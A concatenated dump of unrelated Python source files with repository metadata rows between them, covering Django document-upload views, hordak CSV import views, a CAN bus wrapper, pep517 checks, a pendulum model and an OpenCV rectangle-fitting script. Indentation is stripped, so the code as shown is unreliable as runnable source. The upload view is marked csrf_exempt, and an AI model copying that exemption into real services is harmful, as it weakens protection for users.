def get_upload_page(path, draft_id, is_permanent_application=False):
paths = document_switch(path=path)
is_document_optional = paths["optional"]
# For standard permanent only - upload is mandatory
if "/end-user" in path and is_permanent_application:
is_document_optional = False
return attach_document_form(
application_id=draft_id, strings=paths["strings"], back_link=paths["homepage"], is_optional=is_document_optional
)
def get_homepage(request, draft_id, obj_pk=None):
data = {"pk": draft_id}
if obj_pk:
data["obj_pk"] = obj_pk
try:
url = reverse(document_switch(request.path)["homepage"], kwargs=data)
except NoReverseMatch:
url = reverse(document_switch(request.path)["homepage"], kwargs={"pk": draft_id})
return redirect(url)
def get_delete_confirmation_page(path, pk):
paths = document_switch(path)
return delete_document_confirmation_form(
overview_url=reverse(paths["homepage"], kwargs={"pk": pk}), strings=paths["strings"],
)
@method_decorator(csrf_exempt, "dispatch")
class AttachDocuments(LoginRequiredMixin, TemplateView):
def get(self, request, **kwargs):
draft_id = str(kwargs["pk"])
form = get_upload_page(request.path, draft_id)
return form_page(request, form, extra_data={"draft_id": draft_id})
@csrf_exempt
def post(self, request, **kwargs):
draft_id = str(kwargs["pk"])
application = get_application(request, draft_id)
is_permanent_application = is_application_export_type_permanent(application)
form = get_upload_page(request.path, draft_id, is_permanent_application=is_permanent_application)
try:
request.upload_handlers.insert(0, S3FileUploadHandler(request))
files = request.FILES
except Exception: # noqa
return error_page(request, strings.applications.AttachDocumentPage.UPLOAD_FAILURE_ERROR)
# Only validate documents if there are any present or are mandatory in the following cases:
# standard permanent application end user section, additional documents section
if (
files
or ("/end-user" in request.path and is_application_export_type_permanent(application))
or "additional-document" in request.path
):
logging.info(self.request)
data, error = add_document_data(request)
if error:
return form_page(request, form, extra_data={"draft_id": draft_id}, errors={"documents": [error]})
action = document_switch(request.path)["attach"]
if len(signature(action).parameters) == 3:
_, status_code = action(request, draft_id, data)
if status_code == HTTPStatus.CREATED:
return get_homepage(request, draft_id)
else:
_, status_code = action(request, draft_id, kwargs["obj_pk"], data)
if status_code == HTTPStatus.CREATED:
return get_homepage(request, draft_id, kwargs["obj_pk"])
return error_page(request, strings.applications.AttachDocumentPage.UPLOAD_FAILURE_ERROR)
return get_homepage(request, draft_id)
class DownloadDocument(LoginRequiredMixin, TemplateView):
def get(self, request, **kwargs):
draft_id = str(kwargs["pk"])
action = document_switch(request.path)["download"]
if len(signature(action).parameters) == 2:
document, _ = action(request, draft_id)
else:
document, _ = action(request, draft_id, kwargs["obj_pk"])
document = document["document"]
if document["safe"]:
return download_document_from_s3(document["s3_key"], document["name"])
else:
return error_page(request, strings.applications.AttachDocumentPage.DOWNLOAD_GENERIC_ERROR)
class DownloadGeneratedDocument(LoginRequiredMixin, TemplateView):
def get(self, request, case_pk, document_pk):
document, _ = get_document(request, pk=document_pk)
client = s3_client()
signed_url = client.generate_presigned_url(
"get_object",
Params={"Bucket": settings.AWS_STORAGE_BUCKET_NAME, "Key": document["document"]["s3_key"],},
ExpiresIn=15,
)
return redirect(signed_url)
class DeleteDocument(LoginRequiredMixin, TemplateView):
def get(self, request, **kwargs):
return form_page(request, get_delete_confirmation_page(request.path, str(kwargs["pk"])))
def post(self, request, **kwargs):
draft_id = str(kwargs["pk"])
option = request.POST.get("delete_document_confirmation")
if option is None:
return form_page(
request,
get_delete_confirmation_page(request.path, str(kwargs["pk"])),
errors={"delete_document_confirmation": ["Select yes to confirm you want to delete the document"]},
)
else:
if option == "yes":
action = document_switch(request.path)["delete"]
if len(signature(action).parameters) == 2:
status_code = action(request, draft_id)
else:
status_code = action(request, draft_id, kwargs["obj_pk"])
if status_code == HTTPStatus.NO_CONTENT:
return get_homepage(request, draft_id)
else:
return error_page(request, strings.applications.DeleteDocument.DOCUMENT_DELETE_GENERIC_ERROR)
else:
return get_homepage(request, draft_id)
| 41.874214 | 120 | 0.685041 |
91a3ebe530010eb3dd73eaf919e939326ee87612 | 3,633 | py | Python | hordak/views/statement_csv_import.py | audience-platform/django-hordak | aa3a18438136a020794b1c0b10603dd78fa7aa76 | [
"MIT"
] | 187 | 2016-12-12T10:58:11.000Z | 2022-03-27T08:14:19.000Z | hordak/views/statement_csv_import.py | audience-platform/django-hordak | aa3a18438136a020794b1c0b10603dd78fa7aa76 | [
"MIT"
] | 62 | 2016-12-10T00:12:47.000Z | 2022-03-16T09:23:05.000Z | hordak/views/statement_csv_import.py | audience-platform/django-hordak | aa3a18438136a020794b1c0b10603dd78fa7aa76 | [
"MIT"
] | 47 | 2016-12-12T11:07:31.000Z | 2022-03-15T20:30:07.000Z | from django.contrib.auth.decorators import login_required
from django.contrib.auth.mixins import LoginRequiredMixin
from django.http import HttpResponseRedirect
from django.urls import reverse
from django.utils.decorators import method_decorator
from django.views.generic import CreateView, UpdateView, DetailView
from hordak.forms.statement_csv_import import (
TransactionCsvImportForm,
TransactionCsvImportColumnFormSet,
)
from hordak.models import TransactionCsvImport
from hordak.resources import StatementLineResource
class CreateImportView(LoginRequiredMixin, CreateView):
model = TransactionCsvImport
form_class = TransactionCsvImportForm
template_name = "hordak/statement_import/import_create.html"
def get_success_url(self):
return reverse("hordak:import_setup", args=[self.object.uuid])
class SetupImportView(LoginRequiredMixin, UpdateView):
"""View for setting up of the import process
This involves mapping columns to import fields, and collecting
the date format
"""
context_object_name = "transaction_import"
slug_url_kwarg = "uuid"
slug_field = "uuid"
model = TransactionCsvImport
fields = ("date_format",)
template_name = "hordak/statement_import/import_setup.html"
def get_context_data(self, **kwargs):
context = super(SetupImportView, self).get_context_data(**kwargs)
context["formset"] = TransactionCsvImportColumnFormSet(instance=self.object)
return context
def post(self, request, *args, **kwargs):
self.object = self.get_object()
form = self.get_form_class()(request.POST, request.FILES, instance=self.object)
formset = TransactionCsvImportColumnFormSet(request.POST, instance=self.object)
if form.is_valid() and formset.is_valid():
return self.form_valid(form, formset)
else:
return self.form_invalid(form, formset)
def form_valid(self, form, formset):
self.object = form.save()
formset.instance = self.object
formset.save()
return HttpResponseRedirect(self.get_success_url())
def form_invalid(self, form, formset):
return self.render_to_response(self.get_context_data(form=form, formset=formset))
def get_success_url(self):
return reverse("hordak:import_dry_run", args=[self.object.uuid])
class AbstractImportView(LoginRequiredMixin, DetailView):
context_object_name = "transaction_import"
slug_url_kwarg = "uuid"
slug_field = "uuid"
model = TransactionCsvImport
dry_run = True
def get(self, request, **kwargs):
return super(AbstractImportView, self).get(request, **kwargs)
def post(self, request, **kwargs):
transaction_import = self.get_object()
resource = StatementLineResource(
date_format=transaction_import.date_format,
statement_import=transaction_import.hordak_import,
)
self.result = resource.import_data(
dataset=transaction_import.get_dataset(),
dry_run=self.dry_run,
use_transactions=True,
collect_failed_rows=True,
)
return self.get(request, **kwargs)
def get_context_data(self, **kwargs):
return super(AbstractImportView, self).get_context_data(
result=getattr(self, "result", None), **kwargs
)
class DryRunImportView(AbstractImportView):
template_name = "hordak/statement_import/import_dry_run.html"
dry_run = True
class ExecuteImportView(AbstractImportView):
template_name = "hordak/statement_import/import_execute.html"
dry_run = False
| 34.273585 | 89 | 0.720066 |
f1c6bea1422eca8375292d8b462f9486a26220db | 1,729 | py | Python | uds/uds_communications/TransportProtocols/Can/CanConnection.py | J3rome/python-uds | fe0f7a9505cb7b87f693ab736d713d7871dff288 | [
"MIT"
] | 62 | 2019-02-13T20:26:12.000Z | 2022-02-23T19:47:34.000Z | uds/uds_communications/TransportProtocols/Can/CanConnection.py | J3rome/python-uds | fe0f7a9505cb7b87f693ab736d713d7871dff288 | [
"MIT"
] | 58 | 2018-07-09T10:58:33.000Z | 2022-01-31T20:27:13.000Z | uds/uds_communications/TransportProtocols/Can/CanConnection.py | J3rome/python-uds | fe0f7a9505cb7b87f693ab736d713d7871dff288 | [
"MIT"
] | 33 | 2019-03-25T07:30:34.000Z | 2022-03-08T12:55:35.000Z | #!/usr/bin/env python
__author__ = "David Hayward"
__copyrights__ = "Copyright 2019, the python-uds project"
__credits__ = ["David Hayward"]
__license__ = "MIT"
__maintainer__ = "Richard Clubb"
__email__ = "richard.clubb@embeduk.com"
__status__ = "Development"
import can
##
# @brief Small class to wrap the CAN Bus/Notifier/Listeners to allow multiple clients for each bus/connection
class CanConnection(object):
def __init__(self, callback, filter, bus):
self.__bus = bus
listener = can.Listener()
listener.on_message_received = callback
self.__notifier = can.Notifier(self.__bus, [listener], 0)
self.__listeners = [listener]
self.addFilter(filter)
##
# @brief Adds call back (via additional listener) to the notifier which is attached to this bus
def addCallback(self, callback):
listener = can.Listener()
listener.on_message_received = callback
self.__notifier.add_listener(listener)
self.__listeners.append(listener)
##
# @brief Adds a filter (CAN Msg Id) to the bus to allow messages through to the callback
def addFilter(self, filter):
filters = self.__bus.filters
if filters is not None:
filters.append({"can_id": filter, "can_mask": 0xFFF, "extended": False})
else:
filters = [{"can_id": filter, "can_mask": 0xFFF, "extended": False}]
self.__bus.set_filters(filters)
##
# @brief transmits the data over can using can connection
def transmit(self, data, reqId, extended=False):
canMsg = can.Message(arbitration_id=reqId, extended_id=extended)
canMsg.dlc = 8
canMsg.data = data
self.__bus.send(canMsg)
| 31.436364 | 109 | 0.669751 |
848dc4f670789138198f608f961f10b1f245ba77 | 448 | py | Python | lib/spack/spack/__init__.py | HaochengLIU/spack | 26e51ff1705a4d6234e2a0cf734f93f7f95df5cb | [
"ECL-2.0",
"Apache-2.0",
"MIT"
] | 1 | 2021-03-19T13:12:47.000Z | 2021-03-19T13:12:47.000Z | lib/spack/spack/__init__.py | HaochengLIU/spack | 26e51ff1705a4d6234e2a0cf734f93f7f95df5cb | [
"ECL-2.0",
"Apache-2.0",
"MIT"
] | 1 | 2019-01-11T20:11:52.000Z | 2019-01-11T20:11:52.000Z | lib/spack/spack/__init__.py | HaochengLIU/spack | 26e51ff1705a4d6234e2a0cf734f93f7f95df5cb | [
"ECL-2.0",
"Apache-2.0",
"MIT"
] | null | null | null | # Copyright 2013-2018 Lawrence Livermore National Security, LLC and other
# Spack Project Developers. See the top-level COPYRIGHT file for details.
#
# SPDX-License-Identifier: (Apache-2.0 OR MIT)
#: major, minor, patch version for Spack, in a tuple
spack_version_info = (0, 12, 0)
#: String containing Spack version joined with .'s
spack_version = '.'.join(str(v) for v in spack_version_info)
__all__ = ['spack_version_info', 'spack_version']
| 32 | 73 | 0.75 |
d36c1f411ca1b084e50c3a0cbd666161f971fb34 | 2,015 | py | Python | docs/source/conf.py | Waztom/fragalysis-backend | 1d7775740bc6d4cce3a846064fd57bb0fcdb8269 | [
"Apache-2.0"
] | 1 | 2021-02-09T03:27:24.000Z | 2021-02-09T03:27:24.000Z | docs/source/conf.py | Waztom/fragalysis-backend | 1d7775740bc6d4cce3a846064fd57bb0fcdb8269 | [
"Apache-2.0"
] | 128 | 2018-05-01T09:40:57.000Z | 2022-03-31T12:55:01.000Z | docs/source/conf.py | duncanpeacock/fragalysis-backend | 3684f1000d77ce291cdec6124c041b2570811d4c | [
"Apache-2.0"
] | 17 | 2018-03-20T17:42:04.000Z | 2022-02-02T11:42:39.000Z | # Configuration file for the Sphinx documentation builder.
#
# This file only contains a selection of the most common options. For a full
# list see the documentation:
# https://www.sphinx-doc.org/en/master/usage/configuration.html
# -- Path setup --------------------------------------------------------------
# If extensions (or modules to document with autodoc) are in another directory,
# add these directories to sys.path here. If the directory is relative to the
# documentation root, use os.path.abspath to make it absolute, like shown here.
#
import sys
import os
import django
sys.path.insert(0, os.path.abspath('../..'))
os.environ['DJANGO_SETTINGS_MODULE'] = 'fragalysis.settings'
django.setup()
# -- Project information -----------------------------------------------------
project = 'Fragalysis-Backend'
copyright = '2020, Rachael Skyner'
author = 'Rachael Skyner'
# -- General configuration ---------------------------------------------------
# Add any Sphinx extension module names here, as strings. They can be
# extensions coming with Sphinx (named 'sphinx.ext.*') or your custom
# ones.
extensions = ['sphinx.ext.autodoc', 'sphinx.ext.coverage', 'sphinx.ext.napoleon']
# Add any paths that contain templates here, relative to this directory.
templates_path = ['_templates']
# List of patterns, relative to source directory, that match files and
# directories to ignore when looking for source files.
# This pattern also affects html_static_path and html_extra_path.
exclude_patterns = []
# -- Options for HTML output -------------------------------------------------
# The theme to use for HTML and HTML Help pages. See the documentation for
# a list of builtin themes.
#
html_theme = 'alabaster'
# Add any paths that contain custom static files (such as style sheets) here,
# relative to this directory. They are copied after the builtin static files,
# so a file named "default.css" will overwrite the builtin "default.css".
html_static_path = ['_static']
master_doc = 'index'
| 34.152542 | 81 | 0.672953 |
088e7f546e802ab13c10a19ed5f8c7cbda30a152 | 1,894 | py | Python | pendulum.py | phantomm88/dynamical | be57466c03402b7eeff92b8d1c71a3c622309800 | [
"Apache-2.0"
] | null | null | null | pendulum.py | phantomm88/dynamical | be57466c03402b7eeff92b8d1c71a3c622309800 | [
"Apache-2.0"
] | null | null | null | pendulum.py | phantomm88/dynamical | be57466c03402b7eeff92b8d1c71a3c622309800 | [
"Apache-2.0"
] | null | null | null | # N-pendulum source file
import numpy as np
class Joint:
def __init__(self, x, y, fix=False):
self.x = x
self.y = y
self.forces = []
self.fixValue = fix
self.beamCodes = []
def getX(self):
return self.x
def getY(self):
return self.y
def getForces(self):
return self.forces
def getFixValue(self):
return self.fixValue
def setFixValue(self, newFix):
self.fixValue = newFix
def setX(self, newX):
self.x = newX
def setY(self, newY):
self.y = newY
def getBeamCodes(self):
return self.beamCodes
def addBeamCode(self, code):
self.beamCodes.append(code)
def addForce(self, newForce):
self.forces.append(newForce)
def removeForce(self, index=None):
if index is None:
self.force.pop()
else:
self.force.pop(index)
def dist(self, joint2):
return np.sqrt((joint2.getX() - self.x)**2 + (joint2.getY() - self.y)**2)
class Beam:
# joint1 and joint2 are linked, with joint2 being further away from base. constants are made of K and rest length, in order
def __init__(self, k, restLength):
self.k, self.restLength = k, restLength
def link(self, joint1, joint2):
joint1.addBeamCode((id(self), self.k, self.restLength))
joint2.addBeamCode((id(self), self.k, self.restLength))
joint2.addForce((-self.k * (joint1.dist(joint2) - self.restLength), id(self)))
def getJoint1(self):
return self.joint1
def setJoint1(self, newJoint1):
self.joint1 = newJoint1
def getJoint2(self):
return self.joint2
def setJoint2(self, newJoint2):
self.joint2 = newJoint2
def getK(self):
return self.k
def setK(self, newK):
self.k = newK
a = Joint(3, 4)
b = Joint(5, 10)
c = Beam(3, 10)
c.link(a, b)
| 29.59375 | 127 | 0.601373 |
c4bbcab7553e4dd761245b7d7d206cb2f3b4ac77 | 122 | py | Python | superhelp/displayers/cli_displayer.py | grantps/superhelp | d8e861bf1ad91571ac23b9c833a8cd461bb1952f | [
"MIT"
] | 27 | 2020-05-17T20:48:43.000Z | 2022-01-08T21:32:30.000Z | superhelp/displayers/cli_displayer.py | grantps/superhelp | d8e861bf1ad91571ac23b9c833a8cd461bb1952f | [
"MIT"
] | null | null | null | superhelp/displayers/cli_displayer.py | grantps/superhelp | d8e861bf1ad91571ac23b9c833a8cd461bb1952f | [
"MIT"
] | null | null | null | """
LOL - a bit underwhelming in the case of CLI output.
"""
def display(formatted_help: str):
print(formatted_help)
| 17.428571 | 52 | 0.704918 |
164d08ce3ee2a82a474371752e92461bdcf36142 | 5,749 | py | Python | pep517/check.py | uranusjr/pep517 | 5d25cfdf3caecd0e3c87d3b9788a891306df58e0 | [
"MIT"
] | null | null | null | pep517/check.py | uranusjr/pep517 | 5d25cfdf3caecd0e3c87d3b9788a891306df58e0 | [
"MIT"
] | null | null | null | pep517/check.py | uranusjr/pep517 | 5d25cfdf3caecd0e3c87d3b9788a891306df58e0 | [
"MIT"
] | null | null | null | """Check a project and backend by attempting to build using PEP 517 hooks.
"""
import argparse
import logging
import os
from os.path import isfile, join as pjoin
from pytoml import TomlError, load as toml_load
import shutil
from subprocess import CalledProcessError
import sys
import tarfile
from tempfile import mkdtemp
import zipfile
from .colorlog import enable_colourful_output
from .envbuild import BuildEnvironment
from .wrappers import Pep517HookCaller
log = logging.getLogger(__name__)
def check_build_sdist(hooks):
with BuildEnvironment() as env:
try:
env.pip_install(hooks.build_sys_requires)
log.info('Installed static build dependencies')
except CalledProcessError:
log.error('Failed to install static build dependencies')
return False
try:
reqs = hooks.get_requires_for_build_sdist({})
log.info('Got build requires: %s', reqs)
except:
log.error('Failure in get_requires_for_build_sdist', exc_info=True)
return False
try:
env.pip_install(reqs)
log.info('Installed dynamic build dependencies')
except CalledProcessError:
log.error('Failed to install dynamic build dependencies')
return False
td = mkdtemp()
log.info('Trying to build sdist in %s', td)
try:
try:
filename = hooks.build_sdist(td, {})
log.info('build_sdist returned %r', filename)
except:
log.info('Failure in build_sdist', exc_info=True)
return False
if not filename.endswith('.tar.gz'):
log.error("Filename %s doesn't have .tar.gz extension", filename)
return False
path = pjoin(td, filename)
if isfile(path):
log.info("Output file %s exists", path)
else:
log.error("Output file %s does not exist", path)
return False
if tarfile.is_tarfile(path):
log.info("Output file is a tar file")
else:
log.error("Output file is not a tar file")
return False
finally:
shutil.rmtree(td)
return True
def check_build_wheel(hooks):
with BuildEnvironment() as env:
try:
env.pip_install(hooks.build_sys_requires)
log.info('Installed static build dependencies')
except CalledProcessError:
log.error('Failed to install static build dependencies')
return False
try:
reqs = hooks.get_requires_for_build_wheel({})
log.info('Got build requires: %s', reqs)
except:
log.error('Failure in get_requires_for_build_sdist', exc_info=True)
return False
try:
env.pip_install(reqs)
log.info('Installed dynamic build dependencies')
except CalledProcessError:
log.error('Failed to install dynamic build dependencies')
return False
td = mkdtemp()
log.info('Trying to build wheel in %s', td)
try:
try:
filename = hooks.build_wheel(td, {})
log.info('build_wheel returned %r', filename)
except:
log.info('Failure in build_wheel', exc_info=True)
return False
if not filename.endswith('.whl'):
log.error("Filename %s doesn't have .whl extension", filename)
return False
path = pjoin(td, filename)
if isfile(path):
log.info("Output file %s exists", path)
else:
log.error("Output file %s does not exist", path)
return False
if zipfile.is_zipfile(path):
log.info("Output file is a zip file")
else:
log.error("Output file is not a zip file")
return False
finally:
shutil.rmtree(td)
return True
def check(source_dir):
pyproject = pjoin(source_dir, 'pyproject.toml')
if isfile(pyproject):
log.info('Found pyproject.toml')
else:
log.error('Missing pyproject.toml')
return False
try:
with open(pyproject) as f:
pyproject_data = toml_load(f)
# Ensure the mandatory data can be loaded
buildsys = pyproject_data['build-system']
requires = buildsys['requires']
backend = buildsys['build-backend']
log.info('Loaded pyproject.toml')
except (TomlError, KeyError):
log.error("Invalid pyproject.toml", exc_info=True)
return False
hooks = Pep517HookCaller(source_dir, backend)
sdist_ok = check_build_sdist(hooks)
wheel_ok = check_build_wheel(hooks)
if not sdist_ok:
log.warning('Sdist checks failed; scroll up to see')
if not wheel_ok:
log.warning('Wheel checks failed')
return sdist_ok
def main(argv=None):
ap = argparse.ArgumentParser()
ap.add_argument('source_dir',
help="A directory containing pyproject.toml")
args = ap.parse_args(argv)
enable_colourful_output()
ok = check(args.source_dir)
if ok:
print(ansi('Checks passed', 'green'))
else:
print(ansi('Checks failed', 'red'))
sys.exit(1)
ansi_codes = {
'reset': '\x1b[0m',
'bold': '\x1b[1m',
'red': '\x1b[31m',
'green': '\x1b[32m',
}
def ansi(s, attr):
if os.name != 'nt' and sys.stdout.isatty():
return ansi_codes[attr] + str(s) + ansi_codes['reset']
else:
return str(s)
if __name__ == '__main__':
main()
| 29.482051 | 81 | 0.586015 |
48baf003a0e2683ebc478c604abfd9fadb4ee4f0 | 10,632 | py | Python | image_MER/image_MER.py | WangHongshuo/Image_Algorithms | 67a4fd15d670f3f17e1a83123df28a740e821912 | [
"MIT"
] | 5 | 2020-03-22T14:50:54.000Z | 2021-11-18T09:27:15.000Z | image_MER/image_MER.py | WangHongshuo/Image_Algorithms | 67a4fd15d670f3f17e1a83123df28a740e821912 | [
"MIT"
] | null | null | null | image_MER/image_MER.py | WangHongshuo/Image_Algorithms | 67a4fd15d670f3f17e1a83123df28a740e821912 | [
"MIT"
] | 3 | 2019-04-05T19:43:39.000Z | 2020-10-06T10:49:31.000Z | import cv2 as cv
import numpy as np
import copy
import math
from collections import OrderedDict
# @class 二维点
# @member _x x坐标
# @member _y y坐标
class Point2:
def __init__(self,_x,_y):
self.x = _x
self.y = _y
def __sub__(self,p):
res = Point2(0,0)
res.x = self.x - p.x
res.y = self.y - p.y
return res
# @fn print输出点坐标
# return str
def __str__(self):
return "[" + str(self.x) + ", " + str(self.y) + "] "
# @fn 计算两个向量叉积
# @param p 第二个向量
# @return 叉积
def crossProduct(self,p):
return self.x * p.y - self.y * p.x
# @fn 计算两个向量点积
# @param p 第二个向量
# @return 点积
def dotProduct(self,p):
return self.x * p.x + self.y * p.y
class Rect2:
def __init__(self,_p,_minBorder,_maxBorder,_area):
self.p = _p
self.minBorder = _minBorder
self.maxBorder = _maxBorder
self.area = _area
# @class 边缘信息
# @member topLeft 边缘区域左上坐标
# @member bottomRight 边缘区域右下坐标
# @member borderPoints 边缘点集
class Border:
def __init__(self):
self.topLeft = Point2(-1,-1)
self.bottomRight = Point2(-1,-1)
self.borderPoints = OrderedDict()
# @fn 获取边缘图像
# @param src 输入图像
# @param mark 根据灰度标记获取边缘
# @return 边缘图像
def getBinaryImageBorder(src,mark):
borderImg = copy.deepcopy(src)
rows = src.shape[0]
cols = src.shape[1]
# (x,y)的8邻域全等于标记值,则f(x,y) = 0
for i in range(1,rows-1):
for j in range(1,cols-1):
if(src[i][j] == mark and
src[i-1][j-1] == mark and src[i-1][j] == mark and
src[i-1][j+1] == mark and src[i][j-1] == mark and
src[i][j+1] == mark and src[i+1][j-1] == mark and
src[i+1][j] == mark and src[i+1][j+1] == mark):
borderImg[i][j] = 0
return borderImg
# @fn 获取边缘图像的边缘信息
# @param src 输入边缘图像
# @param mark 边缘标记灰度值
# @return 边缘信息
def getBorderInfo(src,mark):
b = Border()
rows = src.shape[0]
cols = src.shape[1]
# 按照从上到下从左到右的顺序录入边缘额点
for i in range(0,rows):
for j in range(0,cols):
if(src[i][j] == mark):
if(not i in b.borderPoints):
b.borderPoints[i] = list()
b.borderPoints[i].append(Point2(i,j))
# 获取边缘区域左上右下坐标,边缘全包含在以这两点为顶点的矩形内
b.topLeft.x = next(iter(b.borderPoints.items()))[0]
b.bottomRight.x = next(reversed(b.borderPoints.items()))[0]
b.topLeft.y = (next(iter(b.borderPoints.items()))[1])[0].y
b.bottomRight.y = (next(reversed(b.borderPoints.items()))[1])[-1].y
for i in b.borderPoints:
if(b.borderPoints[i][0].y < b.topLeft.y):
b.topLeft.y = b.borderPoints[i][0].y
if(b.borderPoints[i][-1].y > b.bottomRight.y):
b.bottomRight.y = b.borderPoints[i][-1].y
return b
# @fn 获取凸包点集
# @param bInfo 目标边缘信息
# @return 凸包点集
def getConvexHull(borderInfo):
# dict浅拷贝
bP = borderInfo.borderPoints
top = borderInfo.topLeft.x
bottom = borderInfo.bottomRight.x
# 从下方开始进行Graham扫描,水平序
# opencv坐标系对Graham扫描无影响,不比转换坐标系
pStack = list()
it = reversed(bP)
key = next(it)
pStack.append(bP[key][0])
pStack.append(bP[key][-1])
key = next(it)
pStack.append(bP[key][-1])
while(key != top):
key = next(it)
nextPoint = bP[key][-1]
vec1 = pStack[-2] - pStack[-1]
vec2 = nextPoint - pStack[-1]
cP = vec1.crossProduct(vec2)
while( cP > 0):
pStack.pop(-1)
vec1 = pStack[-2] - pStack[-1]
vec2 = nextPoint - pStack[-1]
cP = vec1.crossProduct(vec2)
pStack.append(nextPoint)
it = iter(bP)
key = next(it)
pStack.append(bP[key][0])
while(key < bottom):
key = next(it)
nextPoint = bP[key][0]
vec1 = pStack[-2] - pStack[-1]
vec2 = nextPoint - pStack[-1]
cP = vec1.crossProduct(vec2)
while( cP > 0):
pStack.pop(-1)
vec1 = pStack[-2] - pStack[-1]
vec2 = nextPoint - pStack[-1]
cP = vec1.crossProduct(vec2)
pStack.append(nextPoint)
# 清除在同一直线上的重复点
res = list()
res.append(pStack[0])
res.append(pStack[1])
i = 1
j = 2
while(j < len(pStack)-1):
if(res[i].y != pStack[j].y or pStack[j].x == top or pStack[j].x == bottom):
res.append(pStack[j])
i += 1
elif(pStack[j].y != pStack[j+1].y):
res.append(pStack[j])
i += 1
j += 1
res.append(pStack[-1])
return res
# @fn 获取点在直线y=kx+b上投影坐标
# @param k y=kx+b中的k
# @param b y=kx+b中的b
# @param x 点坐标x
# @param y 点坐标y
# @return Point2(x,y),点在直线y=kx+b上投影坐标
def getPointProjectionInLine(k,b,x,y):
x = (k * (y - b) + x) / (k * k + 1)
y = k * x + b
return Point2(x,y)
# @fn 由旋转卡壳法获得的最小外接矩形的5个求矩形4个顶点坐标
# @param bottom1 最小外接矩形底部边上的点1
# @param bottom2 最小外接矩形底部边上的点2
# @param top 最小外接矩形顶部边上的点
# @param left 最小外接矩形左侧边上的点
# @param right 最小外接矩形右侧边上的点
# @return 矩形4个顶点坐标
def getRectInfo(bottom1,bottom2,top,left,right):
p = list([Point2(0,0),Point2(0,0),Point2(0,0),Point2(0,0)])
if(bottom1.x == bottom2.x):
p[0] = Point2(bottom1.x,right.y)
p[1] = Point2(bottom1.x,left.y)
p[2] = Point2(top.x,left.y)
p[3] = Point2(top.x,right.y)
elif(bottom1.y == bottom2.y):
p[0] = Point2(right.x,bottom1.y)
p[1] = Point2(left.x,bottom1.y)
p[2] = Point2(left.x,top.y)
p[3] = Point2(right.x,top.y)
else:
k1 = (bottom1.y - bottom2.y) / (bottom1.x - bottom2.x)
b1 = bottom2.y - k1 * bottom2.x
p[0] = getPointProjectionInLine(k1,b1,right.x,right.y)
p[1] = getPointProjectionInLine(k1,b1,left.x,left.y)
k2 = k1
b2 = top.y - k2 * top.x
p[2] = getPointProjectionInLine(k2,b2,left.x,left.y)
p[3] = getPointProjectionInLine(k2,b2,right.x,right.y)
return p
# @fn 由旋转卡壳法求最小外接矩形
# @param convexHullPoints 凸包点急
# @return 最小外接矩形的信息(4个顶点,高,宽,面积)
def getMinRectByRotatingCalipers(convexHullPoints):
# convexHullPoints[0]和convexHullPoints[-1]相等
# 避免在搜索顶点时影响结果,去掉最后一个,搜索用cHP1
cHP = convexHullPoints
cHP1 = cHP[0:-1]
pCnt = len(cHP1)
# 点少于3个时没有做相关处理
if(pCnt < 3):
return -1
# 初始搜索参数
# t - 顶部
# r - 右侧
# l - 左侧
t = 2
r = 2
l = pCnt - 1
# 暂存最小参数
minArea = 0
minT = 0
minR = 0
minL = 0
minI = 0
minH = 0
minW = 0
for i in range(0,pCnt):
# 底部向量,以该向量为底,用向量叉积来寻找凸包上距离该向量最远的点t
# 以t为中间点,用向量的点积寻找t最右边的点r和最左边的点l(投影法)
vBottom = cHP[i+1] - cHP[i]
# 顶点t
vTop = cHP1[t] - cHP[i]
last = vBottom.crossProduct(vTop)
curr = 0.0
while(1):
vTop = cHP1[(t+1)%pCnt] - cHP[i]
curr = vBottom.crossProduct(vTop)
if(curr > last):
last = curr
else:
break
t = (t+1) % pCnt
# 右侧r
vRight = cHP1[r] - cHP[i]
last = vBottom.dotProduct(vRight)
curr = 0.0
while(1):
vRight = cHP1[(r+1)%pCnt] - cHP[i]
curr = vBottom.dotProduct(vRight)
if(curr > last):
last = curr
else:
break
r = (r+1) % pCnt
# 左侧l
if(i == 0):
l = t
vLeft = cHP1[l] - cHP[i]
last = vBottom.dotProduct(vLeft)
curr = 0.0
while(1):
vRight = cHP1[(l+1)%pCnt] - cHP[i]
curr = vBottom.dotProduct(vRight)
if(curr < last):
last = curr
else:
break
l = (l+1) % pCnt
# 计算高和宽(不是最小外接矩形的高和宽,w*h数值上等于最小外接矩形面积)
h = vBottom.crossProduct(cHP1[t]-cHP[i]) / vBottom.dotProduct(vBottom)
w = vBottom.dotProduct(cHP1[r]-cHP[i]) - vBottom.dotProduct(cHP1[l]-cHP[i])
tmpArea = w * h
if(i == 0 or tmpArea < minArea):
minArea = tmpArea
minI = i
minT = t
minR = r
minL = l
minH = h
minW = w
# 由5点求出最小外接矩形参数
p = getRectInfo(cHP[minI],cHP[minI+1],cHP1[minT],cHP1[minL],cHP1[minR])
tmpW = math.sqrt(math.pow(p[0].x - p[1].x, 2) + math.pow(p[0].y - p[1].y, 2))
tmpH = math.sqrt(math.pow(p[0].x - p[3].x, 2) + math.pow(p[0].y - p[3].y, 2))
# 求最小外接矩形的短边与长边
maxBorder = max(tmpW, tmpH)
minBorder = min(tmpW, tmpH)
rect = Rect2(p,minBorder,maxBorder,minArea)
return rect
def getMER(src):
# 根据标记获取边缘
borderImg = getBinaryImageBorder(src,255)
# 根据标记获取边缘点
b = getBorderInfo(borderImg,255)
# 获取凸包点集
ch = getConvexHull(b)
# 获取最小外接矩形
minRect = getMinRectByRotatingCalipers(ch)
return minRect
input = cv.imread("H://Test_Img//MBR.bmp",cv.IMREAD_GRAYSCALE)
cv.imshow("input",input)
minRect = getMER(input)
# 画出最小外接矩形
output = cv.cvtColor(input,cv.COLOR_GRAY2RGB)
cv.line(output,(round(minRect.p[0].y),round(minRect.p[0].x)),(round(minRect.p[1].y),round(minRect.p[1].x)),(0,255,0),1)
cv.line(output,(round(minRect.p[1].y),round(minRect.p[1].x)),(round(minRect.p[2].y),round(minRect.p[2].x)),(0,255,0),1)
cv.line(output,(round(minRect.p[2].y),round(minRect.p[2].x)),(round(minRect.p[3].y),round(minRect.p[3].x)),(0,255,0),1)
cv.line(output,(round(minRect.p[3].y),round(minRect.p[3].x)),(round(minRect.p[0].y),round(minRect.p[0].x)),(0,255,0),1)
cv.imshow("Min Rect",output)
cv.waitKey(0)
| 32.218182 | 119 | 0.491065 |
7afe24a90bc6663211ec3e0310eb4d5e8593c2b8 | 1,599 | py | Python | boa3_test/examples/test_native/example_contract_for_wrapped_tokens.py | DanPopa46/neo3-boa | e4ef340744b5bd25ade26f847eac50789b97f3e9 | [
"Apache-2.0"
